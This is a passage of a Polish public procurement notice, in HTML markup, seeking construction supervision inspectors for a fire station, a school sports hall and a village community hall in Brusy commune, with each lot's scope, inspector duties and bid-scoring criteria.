<span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami oceny:<br/>A - Cena - 60%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Cena” wynosi 60.<br/>Liczba punktów przyznana ofercie w kryterium cena zostanie obliczona wg wzoru:<br/> <br/> cena najniższa<br/>A = -------------------------- x 100 x 60% <br/> cena oferty badanej<br/><br/>Wyniki będą zaokrąglane do 2 miejsc po przecinku (od 5 w górę).<br/>B – Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej – 40%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej” wynosi 40. <br/>Gdy Wykonawca wykaże, że Inspektora nadzoru branży konstrukcyjno - budowlanej wskazany w ofercie posiada doświadczenie jako Inspektor nadzoru branży konstrukcyjno - budowlanej na: <br/>	żadnym lub jednym zadaniu dot. robót konstrukcyjno - budowlanych- otrzyma 0 punktów <br/>	dwóch zadaniach dot. robót konstrukcyjno - budowlanych - otrzyma 20 punktów <br/>	trzech lub więcej zadaniach dot. robót konstrukcyjno - budowlanych - otrzyma 40 punktów.<br/>Ocena łączna X= A + B <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższa liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest pełnienie obowiązków inspektora nadzoru inwestorskiego nad robotami budowlanymi realizowanymi w ramach zadania:<br/>Część II „Wsparcie systemu ratownictwa oraz zarządzania kryzysowego na terenie gminy Brusy” - Budowa remizy OSP przy świetlicy wiejskiej w Czapiewicach;<br/>2.	Usługa polegała będzie na pełnienie nadzoru inwestorskiego dla następującego zakresu prac:<br/>dla części II*:<br/>roboty budowlane:<br/>	roboty ziemne, ławy, ściany fundamentowe,<br/>	ściany i konstrukcje,<br/>	dach,<br/>	posadzki,<br/>	stolarkę drzwiową i okienną,<br/>	prace wykończeniowe,<br/>	wykonanie elewacji,<br/>dostawę i montaż wyposażenia, m.in. szafki do garażu na 16 osób otwarte bez nóżek (np. STR400/4), regał stalowy o wym. ok. 100x50x200 – ilość 5 szt., aneks kuchenny (szafki dolne i górne) o długości ok. 2,0m z zlewozmywakiem, stół i krzesła na 8 osób), do pom. nr 6 dostarczyć szafkę narzędziową na kółkach np. Yato YT-55307, wyposażenie do pom. sanitarnych ze stali nierdzewnej (pojemnik na mydło, pojemnik do ręczników papierowych, uchwyt do papieru toaletowego, kosz na śmieci) <br/>instalacje sanitarne,<br/>	wewnętrzna instalacja wody,<br/>	wewnętrzna instalacja kanalizacji sanitarnej,<br/>	wewnętrzna instalacja centralnego ogrzewania,<br/>	wewnętrzna instalacja wentylacji,<br/>	ochrona p.poż,<br/>	wykonanie przyłączy,<br/>instalacje elektryczne,<br/>zagospodarowanie terenu<br/>dodatkowe roboty i zmiany:<br/>- w pom. nr 3 przesunięcie umywalki w stronę ściany z pom. nr 2,<br/>- przeniesienie zlewu z pom. nr 5 do pom. nr 6,<br/>- wykonanie pom. nr 6 jako otwartego, bez ściany i drzwi,<br/>- zmianie drzwi wejściowych do pom. nr 2 z prawych na lewe,<br/>- wykonanie kompletnego szynowego odciągu spalin (wydajność 1500m3/h) z automatycznym wypięciem ssawki wraz z niezbędnymi urządzeniami ,<br/>- doprowadzenie instalacji wody i powietrza do narożnika (między ścianą z bramą a ścianą z oknami) w pom. nr 1,<br/>- wykonanie w pom. nr 6 instalacji powietrza wraz z dostarczeniem sprężarki samochodowej, tłokowej (stopień sprężania 10 bar, pojemność sprężania 100 l);<br/>- wykonanie konstrukcji oraz syreny szczelinowej z osprzętem, np. sytemu DSP, kabli i anteny (np. .model 52L),<br/>- wprowadzenie internetu i monitoringu, <br/> - wykonanie napisu na elewacji „ OSP Czapiewice” wraz z podświetleniem,<br/>- wykonanie w garażu odwodnienia wraz z przyłączem i separatorem na zewnątrz budynku,<br/>- brama do garażu elektryczna wraz z doprowadzeniem zasilania, wys. bramy 3,55m (Wykonawca zastosuje nadproże strunobetonowe o odpowiedniej nośności, uwzględniającej obliczone w projekcie obciążenia konstrukcji), <br/>- oddzielenie część OSP ścianą REI 60 i wysunięcia jej na 30 cm między pom. nr 6 a pom. nr 7, <br/>- wykonanie przed remizą masztu flagowego o wysokości 6m,<br/>- wykonanie szerszego wjazdu i dojazdu do budynku o ok.3,0m i powierzchni ok.50 m2, <br/> konstrukcję drogi dojazdowej należy wykonać w następujących warstwach: <br/>•	kostka brukowa betonowa gr. 8 cm, <br/>•	podsypka cementowo-piaskowa 1:4 3 cm<br/>•	mieszanka kruszywa mineralnego łamanego 0-31,5 – 20 cm<br/>•	stabilizacja RM 1,5-2,5 MPa<br/>- wymiana pieca c.o. na pellet wraz z montażem ( pom.nr 7). <br/>3.	Zamówienie obejmuje pełnienie funkcji inspektora nadzoru branży budowlano-konstrukcyjnej, sanitarnej i elektrycznej.<br/>4.	Inspektor nadzoru inwestorskiego pełnić będzie funkcję inspektora nadzoru inwestorskiego w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 ze zm.).<br/>5.	Inspektor nadzoru inwestorskiego będzie wykonywać zlecony nadzór zgodnie z wymaganiami Zamawiającego, dokumentacją projektową, obowiązującymi przepisami i zasadami wiedzy technicznej.<br/>6.	Inspektor nadzoru inwestorskiego realizując zadanie będzie zobowiązany do:<br/>1)	Wyznaczenia inspektora koordynatora, który będzie koordynował pełnienie nadzoru inwestorskiego przez koordynatorów wszystkich branż,<br/>2)	reprezentowania Zamawiającego – Inwestora na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową, w szczególności z projektami budowlanymi, specyfikacjami technicznymi wykonania i odbioru robót, decyzjami, przepisami prawa, w zakresie BHP, normami, zasadami wiedzy technicznej oraz zapisami umowy o roboty budowlane z Wykonawcą Inwestycji;<br/>3)	kontroli prawidłowości zafakturowania wykonanych robót, potwierdzenia faktycznie wykonanych robót oraz usunięcia wad także na żądanie Zamawiającego, kontrolowania rozliczeń budowy;<br/>4)	zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami umowy zawartej z wykonawcą robót i dokumentacją projektową, w tym również z projektami budowlanymi, projektami budowlanymi wykonawczymi, specyfikacjami technicznymi wykonania i odbioru robót, dla wszystkich robót,<br/>5)	organizowania roboczych narad koordynacyjnych w sprawie prowadzonych robót <br/>z udziałem Zamawiającego i wszystkich niezbędnych stron oraz sporządzania protokołów z tych narad,<br/>6)	opiniowania wniosków wykonawcy robót w sprawie zmiany sposobu wykonania robót budowlanych, w tym zmiany materiałów, urządzeń i technologii,<br/>7)	w razie zaistnienia robót dodatkowych niezwłocznego zgłoszenia na piśmie konieczności wykonania tych robót wraz z uzasadnieniem, a po uzyskaniu akceptacji Zamawiającego, dokonanie uzgodnień z autorem projektu w zakresie wykonania dokumentacji zamiennej lub niezbędnej dokumentacji na roboty dodatkowe,<br/>8)	niezwłocznego informowania Zamawiającego o konieczności wykonania robót odbiegających od założeń w terminie 3 dni od daty stwierdzenia konieczności ich wykonania,<br/>9)	rozstrzygania w porozumieniu z kierownikiem budowy i przedstawicielem Zamawiającego wątpliwości natury technicznej powstałych w trakcie realizacji zamówienia;<br/>10)	potwierdzania faktycznie wykonanych robót oraz usunięcia wad;<br/>11)	dokonywania odbiorów częściowych robót zanikających i ulegających zakryciu;<br/>12)	sprawdzania i zatwierdzanie operatu kolaudacyjnego przed odbiorem końcowym;<br/>13)	uczestnictwa w odbiorze końcowym inwestycji i przyjmowania od wykonawców wszelkich dokumentów wymaganych w terminie odbioru (w tym sprawdzenia kompletności dokumentów, atestów, aprobat technicznych, protokołów pomiarów, DTR, geodezyjnej inwentaryzacji powykonawczej obiektów i ich części, dziennika budowy oraz innych), niezbędnych do odbioru końcowego całego zadania;<br/>14) wydawania kierownikowi budowy lub kierownikom robót poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych i urządzeń technicznych;<br/>15)	żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową lub pozwoleniem na budowę;<br/>16)	bieżącej kontroli ilości i terminowości wykonywanych robót;<br/>17)	podejmowania działań w celu dotrzymania terminu realizacji inwestycji;<br/>18)	po rozpoczęciu robót budowlanych nadzorowania budowy z taką częstotliwością oraz w takich godzinach, aby była zapewniona skuteczność nadzoru, a w sytuacjach wyjątkowych niezwłocznie, gdy obecność inspektora nadzoru będzie nieodzowna, najpóźniej w następnym dniu od powiadomienia, a w szczególności:<br/>a)	co najmniej jednej wizyty Inspektora nadzoru inwestorskiego w odpowiednich specjalnościach uprawnionego do nadzorowania robót na budynku w każdym tygodniu podczas realizacji robót danej branży, <br/>b)	niezależnie od wizyt określonych w pkt. 18) lit a) konieczna obecność podczas odbiorów częściowych i odbioru końcowego Inspektora Nadzoru inwestorskiego <br/>w specjalności odpowiedniej do zrealizowanych robót będących przedmiotem odbioru częściowego lub końcowego. <br/>c)	wizyty w nagłych sytuacjach na budowie - na wezwanie Zamawiającego <br/>lub Wykonawcy robót stawienie się w terminie nie dłuższym niż 1 dzień <br/>(24 godziny) od wezwania Zamawiającego, <br/>d)	wizyty w przypadku powstania katastrofy budowlanej w ciągu 2 godzin <br/>od wezwania Wykonawcy robót lub Zamawiającego;<br/>19)	kontrolowania prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót;<br/>20)	informowania na bieżąco Zamawiającego o przebiegu prac, o napotkanych problemach i podjętych działaniach zaradczych mających na celu ich przezwyciężenie (wczesne ostrzeganie, zwłaszcza w sprawach mogących wpłynąć na termin zakończenia robót);<br/>21)	prowadzenia dokumentacji fotograficznej inwestycji w szczególności robót ulegających zakryciu, wykonanych wadliwie lub z opóźnieniem i udostępnianie jej na każde żądanie Zamawiającego;<br/>22)	udziału w przekazaniu placu budowy;<br/>23)	uczestnictwa w okresie gwarancji i rękojmi przy przeglądach gwarancyjnych na zawiadomienie Zamawiającego, potwierdzenia usunięcia wad i usterek w okresie gwarancji i rękojmi bez dodatkowego wynagrodzenia;<br/>24)	wykonywania innych czynności, przewidzianych dla inspektora nadzoru w umowie z wykonawcą inwestycji;<br/>25)	wykonania czynności odnoszących się do realizacji uprawnień z tytułu rękojmi za wady wykonanych robót;<br/>26)	przyjęcia od kierownika budowy dokumentacji powykonawczej, dziennika budowy oraz po uprzednim ich sprawdzeniu przekazania ich Zamawiającemu,<br/>27)	przygotowania w porozumieniu z Wykonawcą robót zestawienia wybudowanej infrastruktury (długości, powierzchnie, szt., itp.).<br/>7.	Bez zgody Zamawiającego, Inspektor Nadzoru nie może wprowadzić żadnych zmian w zakresie realizacji umowy na wykonanie robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami oceny:<br/>A - Cena - 60%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Cena” wynosi 60.<br/>Liczba punktów przyznana ofercie w kryterium cena zostanie obliczona wg wzoru:<br/> <br/> cena najniższa<br/>A = -------------------------- x 100 x 60% <br/> cena oferty badanej<br/><br/>Wyniki będą zaokrąglane do 2 miejsc po przecinku (od 5 w górę).<br/>B – Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej – 40%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej” wynosi 40. <br/>Gdy Wykonawca wykaże, że Inspektora nadzoru branży konstrukcyjno - budowlanej wskazany w ofercie posiada doświadczenie jako Inspektor nadzoru branży konstrukcyjno - budowlanej na: <br/>	żadnym lub jednym zadaniu dot. robót konstrukcyjno - budowlanych- otrzyma 0 punktów <br/>	dwóch zadaniach dot. robót konstrukcyjno - budowlanych - otrzyma 20 punktów <br/>	trzech lub więcej zadaniach dot. robót konstrukcyjno - budowlanych - otrzyma 40 punktów.<br/>Ocena łączna X= A + B <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższa liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest pełnienie obowiązków inspektora nadzoru inwestorskiego nad robotami budowlanymi realizowanymi w ramach zadania:<br/>Część III „Budowa nowego boiska wielofunkcyjnego o wymiarach pola gry 12mx24m wraz z zadaszeniem o stałej konstrukcji przy Szkole Podstawowej im. bł. ks. Józefa Jankowskiego w Czyczkowach” dofinansowanego z budżetu Państwa zadania związanego z budową obiektu sportowego w ramach programu Olimpia - program Budowy Przyszkolnych Hal Sportowych na 100 lecie Pierwszych Występów Reprezentacji Polski na Igrzyskach Olimpijskich;<br/>2.	Usługa polegała będzie na pełnienie nadzoru inwestorskiego dla następującego zakresu prac:<br/>dla części III*:<br/>a) rozbudowę szkoły o przedsionek oddziału przedszkolnego, tj:<br/>- roboty ziemne, utwardzenia,<br/>- fundamenty,<br/>- ściany fundamentowe,<br/>- fasada szklana,<br/>- instalacje,<br/>b) przebudowę części istniejącej m.in.:<br/>- wykucia,<br/>- wykonanie sufitu,<br/>- stolarka,<br/>- wykończenia wewnętrzne,<br/>c) rozbudowę szkoły o budowę sali sportowej wraz z łącznikiem, tj.<br/>roboty budowlane:<br/>- roboty ziemne;<br/>- fundamenty,<br/>- ściany fundamentowe,<br/>- podłoga na gruncie,<br/>- ściany zaplecza socjalnego,<br/>- ściany hali sportowej,<br/>- konstrukcja żelbetowa,<br/>- dach zaplecza hali,<br/>- wykończenia wewnętrzne (sufity, ściany, podłogi),<br/>- stolarka okienna i drzwiowa (fasady szklane, stolarka okienna i drzwiowa),<br/>- kominy,<br/>- elewacja,<br/>- wyposażenie dodatkowe,<br/>instalacje elektryczne:<br/>- przebudowa zasilania,<br/>- rozdzielnice elektryczne i wewnętrzne linie zasilające,<br/>- instalacje oświetleniowe,<br/>- instalacje gniazd wtyczkowych i wpustów,<br/>- koryta kablowe – system tras kablowych,<br/>instalacje teletechniczne:<br/>- instalacja okablowania strukturalnego,<br/>- tablica wyników sportowych,<br/>- system monitoringu,<br/>- instalacja systemu nagłośnienia,<br/>- system przyzywowy,<br/>instalacje zewnętrzne:<br/>- instalacja uziemiająca i odgromowa,<br/>- instalacja fotowoltaiczna,<br/>- przyłącze teletechniczne – instalacja zewnętrzna<br/>instalacje sanitarne:<br/>- instalacja ciepła technologicznego i centralnego ogrzewania,<br/>- instalacja wentylacji,<br/>- instalacja wod.-kan.<br/>zagospodarowanie terenu:<br/>- rozbiórka ogrodzenia,<br/>- ogrodzenie wokół stawu,<br/>- ogrodzenie panelowe,<br/>- rozbiórka nawierzchni betonowych,<br/>- utwardzenia,<br/>- wykonanie skarpy przy wodzie stojącej,<br/>- kanalizacja deszczowa,<br/>- kanalizacja sanitarna<br/>- przebudowa zasilania. <br/>wyposażenie<br/>3.	Zamówienie obejmuje pełnienie funkcji inspektora nadzoru branży budowlano-konstrukcyjnej, sanitarnej i elektrycznej.<br/>4.	Inspektor nadzoru inwestorskiego pełnić będzie funkcję inspektora nadzoru inwestorskiego w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 ze zm.).<br/>5.	Inspektor nadzoru inwestorskiego będzie wykonywać zlecony nadzór zgodnie z wymaganiami Zamawiającego, dokumentacją projektową, obowiązującymi przepisami i zasadami wiedzy technicznej.<br/>6.	Inspektor nadzoru inwestorskiego realizując zadanie będzie zobowiązany do:<br/>1)	Wyznaczenia inspektora koordynatora, który będzie koordynował pełnienie nadzoru inwestorskiego przez koordynatorów wszystkich branż,<br/>2)	reprezentowania Zamawiającego – Inwestora na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową, w szczególności z projektami budowlanymi, specyfikacjami technicznymi wykonania i odbioru robót, decyzjami, przepisami prawa, w zakresie BHP, normami, zasadami wiedzy technicznej oraz zapisami umowy o roboty budowlane z Wykonawcą Inwestycji;<br/>3)	kontroli prawidłowości zafakturowania wykonanych robót, potwierdzenia faktycznie wykonanych robót oraz usunięcia wad także na żądanie Zamawiającego, kontrolowania rozliczeń budowy;<br/>4)	zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami umowy zawartej z wykonawcą robót i dokumentacją projektową, w tym również z projektami budowlanymi, projektami budowlanymi wykonawczymi, specyfikacjami technicznymi wykonania i odbioru robót, dla wszystkich robót,<br/>5)	organizowania roboczych narad koordynacyjnych w sprawie prowadzonych robót <br/>z udziałem Zamawiającego i wszystkich niezbędnych stron oraz sporządzania protokołów z tych narad,<br/>6)	opiniowania wniosków wykonawcy robót w sprawie zmiany sposobu wykonania robót budowlanych, w tym zmiany materiałów, urządzeń i technologii,<br/>7)	w razie zaistnienia robót dodatkowych niezwłocznego zgłoszenia na piśmie konieczności wykonania tych robót wraz z uzasadnieniem, a po uzyskaniu akceptacji Zamawiającego, dokonanie uzgodnień z autorem projektu w zakresie wykonania dokumentacji zamiennej lub niezbędnej dokumentacji na roboty dodatkowe,<br/>8)	niezwłocznego informowania Zamawiającego o konieczności wykonania robót odbiegających od założeń w terminie 3 dni od daty stwierdzenia konieczności ich wykonania,<br/>9)	rozstrzygania w porozumieniu z kierownikiem budowy i przedstawicielem Zamawiającego wątpliwości natury technicznej powstałych w trakcie realizacji zamówienia;<br/>10)	potwierdzania faktycznie wykonanych robót oraz usunięcia wad;<br/>11)	dokonywania odbiorów częściowych robót zanikających i ulegających zakryciu;<br/>12)	sprawdzania i zatwierdzanie operatu kolaudacyjnego przed odbiorem końcowym;<br/>13)	uczestnictwa w odbiorze końcowym inwestycji i przyjmowania od wykonawców wszelkich dokumentów wymaganych w terminie odbioru (w tym sprawdzenia kompletności dokumentów, atestów, aprobat technicznych, protokołów pomiarów, DTR, geodezyjnej inwentaryzacji powykonawczej obiektów i ich części, dziennika budowy oraz innych), niezbędnych do odbioru końcowego całego zadania;<br/>14) wydawania kierownikowi budowy lub kierownikom robót poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych i urządzeń technicznych;<br/>15)	żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową lub pozwoleniem na budowę;<br/>16)	bieżącej kontroli ilości i terminowości wykonywanych robót;<br/>17)	podejmowania działań w celu dotrzymania terminu realizacji inwestycji;<br/>18)	po rozpoczęciu robót budowlanych nadzorowania budowy z taką częstotliwością oraz w takich godzinach, aby była zapewniona skuteczność nadzoru, a w sytuacjach wyjątkowych niezwłocznie, gdy obecność inspektora nadzoru będzie nieodzowna, najpóźniej w następnym dniu od powiadomienia, a w szczególności:<br/>a)	co najmniej jednej wizyty Inspektora nadzoru inwestorskiego w odpowiednich specjalnościach uprawnionego do nadzorowania robót na budynku w każdym tygodniu podczas realizacji robót danej branży, <br/>b)	niezależnie od wizyt określonych w pkt. 18) lit a) konieczna obecność podczas odbiorów częściowych i odbioru końcowego Inspektora Nadzoru inwestorskiego <br/>w specjalności odpowiedniej do zrealizowanych robót będących przedmiotem odbioru częściowego lub końcowego. <br/>c)	wizyty w nagłych sytuacjach na budowie - na wezwanie Zamawiającego <br/>lub Wykonawcy robót stawienie się w terminie nie dłuższym niż 1 dzień <br/>(24 godziny) od wezwania Zamawiającego, <br/>d)	wizyty w przypadku powstania katastrofy budowlanej w ciągu 2 godzin <br/>od wezwania Wykonawcy robót lub Zamawiającego;<br/>19)	kontrolowania prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót;<br/>20)	informowania na bieżąco Zamawiającego o przebiegu prac, o napotkanych problemach i podjętych działaniach zaradczych mających na celu ich przezwyciężenie (wczesne ostrzeganie, zwłaszcza w sprawach mogących wpłynąć na termin zakończenia robót);<br/>21)	prowadzenia dokumentacji fotograficznej inwestycji w szczególności robót ulegających zakryciu, wykonanych wadliwie lub z opóźnieniem i udostępnianie jej na każde żądanie Zamawiającego;<br/>22)	udziału w przekazaniu placu budowy;<br/>23)	uczestnictwa w okresie gwarancji i rękojmi przy przeglądach gwarancyjnych na zawiadomienie Zamawiającego, potwierdzenia usunięcia wad i usterek w okresie gwarancji i rękojmi bez dodatkowego wynagrodzenia;<br/>24)	wykonywania innych czynności, przewidzianych dla inspektora nadzoru w umowie z wykonawcą inwestycji;<br/>25)	wykonania czynności odnoszących się do realizacji uprawnień z tytułu rękojmi za wady wykonanych robót;<br/>26)	przyjęcia od kierownika budowy dokumentacji powykonawczej, dziennika budowy oraz po uprzednim ich sprawdzeniu przekazania ich Zamawiającemu,<br/>27)	przygotowania w porozumieniu z Wykonawcą robót zestawienia wybudowanej infrastruktury (długości, powierzchnie, szt., itp.).<br/>7.	Bez zgody Zamawiającego, Inspektor Nadzoru nie może wprowadzić żadnych zmian w zakresie realizacji umowy na wykonanie robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami oceny:<br/>A - Cena - 60%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Cena” wynosi 60.<br/>Liczba punktów przyznana ofercie w kryterium cena zostanie obliczona wg wzoru:<br/> <br/> cena najniższa<br/>A = -------------------------- x 100 x 60% <br/> cena oferty badanej<br/><br/>Wyniki będą zaokrąglane do 2 miejsc po przecinku (od 5 w górę).<br/>B – Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej – 40%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej” wynosi 40. <br/>Gdy Wykonawca wykaże, że Inspektora nadzoru branży konstrukcyjno - budowlanej wskazany w ofercie posiada doświadczenie jako Inspektor nadzoru branży konstrukcyjno - budowlanej na: <br/>	żadnym lub jednym zadaniu dot. robót konstrukcyjno - budowlanych- otrzyma 0 punktów <br/>	dwóch zadaniach dot. robót konstrukcyjno - budowlanych - otrzyma 20 punktów <br/>	trzech lub więcej zadaniach dot. robót konstrukcyjno - budowlanych - otrzyma 40 punktów.<br/>Ocena łączna X= A + B <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższa liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest pełnienie obowiązków inspektora nadzoru inwestorskiego nad robotami budowlanymi realizowanymi w ramach zadania:<br/>Część IV „Budowa świetlicy wiejskiej wraz z remizą w miejscowości Główczewice”. <br/>2.	Usługa polegała będzie na pełnienie nadzoru inwestorskiego dla następującego zakresu prac:<br/>dla części IV*: <br/>roboty budowlane:<br/>- stan surowy (roboty ziemne, fundamenty, roboty murowe, elementy żelbetowe, strop gęstożebrowy, dach, orynnowanie)<br/>- stan wykończeniowy ( posadzki, roboty wykończeniowe, stolarka okienna i drzwiowa, ocieplenie elewacji, logo oraz napisy na elewacji, wyposażenie dodatkowej)<br/>wykonanie instalacji wewnętrznych:<br/>- instalacja wody zimnej i ciepłej,<br/>- instalacja kanalizacji sanitarnej,<br/>- instalacja centralnego ogrzewania,<br/>- instalacja wentylacji mechanicznej,<br/>- instalacje klimatyzacji,<br/>- instalacje 